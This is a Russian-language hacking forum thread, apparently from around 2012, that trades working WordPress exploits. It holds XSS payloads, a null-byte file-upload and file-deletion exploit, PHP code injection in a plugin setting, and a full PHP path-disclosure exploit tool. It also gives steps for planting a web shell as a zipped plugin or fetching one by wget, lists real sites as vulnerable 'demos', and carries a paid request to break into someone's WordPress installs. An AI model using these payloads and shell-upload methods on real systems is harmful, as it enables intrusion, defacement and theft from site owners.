WordPress "All-in-One-SEO-Pack V 1.6.15.2" component ActiveXSS Уязвим параметр $_POST['aiosp_menulabel'] Эксплyатация: В админ панели при заполнение полей, поле Меню метки: передаем Дорк: "inurl:/plugins/all-in-one-seo-pack/" Уязвимый код: Намеренно пока не выкладываю P.S:Чуcтвую запах sql-injection. Сайт разработчика: _ht_p://sempe[antisearch]rplugins.com/ P.S: надеюсь не боян, нашел сегодня на последней фри-версии!
Скачай любой плагин для вп и закинь в архив свой шелл... Через редактирование шаблонов измени шаб и залейся через wget например...
Пакуем шелл в зип. Например rss_class.php => rss_class.zip Добавляем плагин, выбираем наш архив. Готово. /wp-content/plugins/rss_class/
Wordpress Plugin tdo-mini-forms (rfu/rfd) Vulnerabilities PHP: wordpress tdo-mini-forms plugin (rfu/rfd) Vulnerabilities ------------------------------------------------------------ wordpress tdo-mini-forms plugin (remote file upload/remote file deletion) Vulnerabilities Auther : Cold z3ro , www.hackteach.org , www.s3curi7y.com Anonymous => You are the man # Remote file upload : wordpress/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index= file extension : file.php%00;.jpg uploaded path : wordpress/wp-content/uploads/tdomf/tmp/$tdomf_form_id(value)/$user_agent(IP)/$filename.PHP%00;.jpg Example to uploaded path : wordpress/wp-content/uploads/tdomf/tmp/1/127.0.0.1/z3ro.PHP%00;.jpg # Remote file Deletion => Note : useing Any http POST header modifier . tdomf_form_id = 1; deletefile[] = 1; filepath = $varibale ( wp-content/uploads/tdomf/tmp/1/127.0.0.1/z3ro.PHP%00;.jpg ) index = NULL Example to result : wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&deletefile[]=1&filepath=../../../wp-content/uploads/tdomf/tmp/1/127.0.0.1/z3ro.PHP%00;.jpg&index= Eof; # 1337day.com/exploit/19776 [2012-11-21] Кто нибудь скажет как заставить этот плагин залить мой файл в формате .php?
Нашел уязвимость в плагине wp, может кому-то будет полезная. Wordpress "count-per-day v3.2.4" plugin PHP Code Execution В админке в настройках плагина параметр "Последние счетчики - Дни:" Code: 7);phpinfo( Результат: Code: /wp-content/plugins/count-per-day/ajax.php?f=count&time=9999999999
WordPress SEO Plugin 1.3.11 Cross Site Script Vulnerability [+] WordPress SEO Plugin 1.3.11 Cross Site Script XSS [+] Found by Angel Injection [+] Version: 1.3.11 Exploit: Code: http://localhost/?s=[xss here]&x=0&y=0 http://localhost/?s="><script>alert(1)</script>&x=0&y=0
Wordpress 3.5 Active XSS Нужны права администратора. Идем в комментарии к записи, и в комментариях вставляем JS код, к примеру: Code: [COLOR=White]"><script>alert('XSS Test')</script>[/COLOR] Проверить можно тут. Code: L: test P: test (c) MaxFast aka n3m1s
Wordpress 3.5 Full Path Disclosure Exploit: Code: [COLOR=White]localhost/?cat[B][][/B]=1[/COLOR] Result: Code: [COLOR=White]Warning: urldecode() expects parameter 1 to be string, array given in [B]*path*[/B] on line 1735[/COLOR] Example: Code: [COLOR=White]_tpp://sergeybiryukov.ru/?cat[]=1 _ttp://wpsymposium.com/?cat[]=1[/COLOR] Found by MaxFast aka n3m1s
Wordpress <=3.5 Full Path Disclosure Exploit | By n3m1s and zed0x Title: Wordpress <=3.5 Full Path Disclosure Exploit; Credits: n3m1s, Zed0x; Date: 2012-12-20; Source: PHP: <? error_reporting(0); function is_url($URL) { return preg_match('|^http(s)?://[a-z0-9-]+(.[a-z0-9-]+)*(:[0-9]+)?(/.*)?$|i', $URL); } function getCat($URL) { if(!$source = file_get_contents($URL . '?cat[]=wordpress')) { die("<div class='error'><strong>Error</strong> - I can not get the source code for your site.</div>"); } preg_match_all("| array given in (.*?)wp-includes|i", $source, $m); foreach($m[1] as $match) { echo "<div class='result'>" . $match . "</div>"; } } ?> <!DOCTYPE html> <html lang="ru"> <head> <title> Wordpress 3.5 Full Path Disclosure Exploit | By n3m1s and zed0x</title> <style type="text/css"> body { background-color: #111; color: #FFF; font-family: Verdana; font-size: 16px; } input { background-color: #222; color: #FFF; font-family: Verdana; font-size: 16px; padding: 5px; border: 0px; } .error { margin-top: 25px; color: red; font-family: Verdana; font-size: 14px; background-color: #222; padding: 10px; text-align: center; } .result { margin-top: 25px; color: green; font-family: Verdana; font-size: 14px; background-color: #222; padding: 10px; text-align: center; } </style> </head> <body> <FORM method="POST" align="center" id="myForm"> <label><strong>Target:</strong> <input type="text" name="target" value="http://" /></label> <input type="submit" name="submit" value="Expl0it!" /> </FORM> <?php if(isset($_POST['submit']) and !empty($_POST['target'])) { # Work with URL; $URL = strtolower(htmlspecialchars($_POST['target'])); if (substr($URL, -1, 1) !== '/') $URL = $URL . '/'; ### if (!is_url($URL)) die("<div class='error'>URL not valid</div>"); getCat($URL); } ?> </body> </html> NOTICE: this exploit for web, do not forget about copyright!
Ребят, я всё понимаю "активность" и всё такое, но я не вижу смысла в эксплойте из одной строчки, максимум что делающего - раскрывающего пути. Да ещё только 1 метод представлен. Бред. У меня к Вам предложение - впихините в код все известные методы раскрытия пути на WordPress - получите и от меня +, и от других форумчан спасибо. В противном случае придётся удалить топик за ненадобностью. Согласитесь - кому захочется качать php exploit, копировать на тачку, запускать, когда просто можно сделать 1 простое дейсвтие в адресной строке даже по памяти ??
Intelligently guesses hash values in order to extract Wordpress password hashes via W3 Total Cache. +# This affects W3 Total Cache <= 0.9.2.4. w3-total-fail.sh | Code http://git.zx2c4.com/w3-total-fail/tree/w3-total-fail.sh Автор http://git.zx2c4.com/w3-total-fail/
Wordpress Plugins - slidedeck2 pro XSS/File Upload Vulnerability HTML: # Author => Zikou-16 # Download plugin : http://wordpress.org/extend/plugins/slidedeck2/ #=> Exploit Info : ------------------ # The attacker can inject HTML codes & inject a simple file uploader to upload shell ------------------ ------------------ #=> XSS ------------------ http://[target]/[path]/wp-content/plugins/slidedeck2-pro/js/zeroclipboard/test.html inj3ct u'r HTML codes in (Text) then click Copy To Clipboard... screenshot #=> http://i49.tinypic.com/1zgqngx.png ------------------ #=> Shell Upload ------------------ http://[target]/[path]/wp-content/plugins/slidedeck2-pro/js/zeroclipboard/test.html inj3ct u'r simple file uploader & upload u'r shell screenshot #=> http://i45.tinypic.com/1426mhg.jpg ------------------ #=> Demos ------------------ http://thevillagevenue.com/wordpress/wp-content/plugins/slidedeck2-pro/js/zeroclipboard/test.html http://dreamland.com.pk/wp-content/plugins/slidedeck2-pro/js/zeroclipboard/test.html http://oldsouthpawn.com/wp-content/plugins/slidedeck2-pro/js/zeroclipboard/test.html Судя по описанию автора можно вставить простой HTML код загрузки файла с компа, но есть одно большое НО! Без исполняющего .php файла на сервере никакая HTML форма загрузки не сможет залить файл на сервак. Вопрос: какие идеи? © Источник
wordpress Если нарушаю правила, прошу админа не наказывать строго, просто очень нужно не знаю где запостить.. Вопрос состоит вот в чем. Настроил 2 вордпресса, слышал тут есть умельцы, которые щелкают их как семечки. Кто сможет получить доступ хоть на 1 из моих WP плачу 100 wmz (или обговорим на большее).. прошу проявить лояльность и не удалять этот топик, никаких данных тут не кидаю все вопросы в аську... icq: 640831391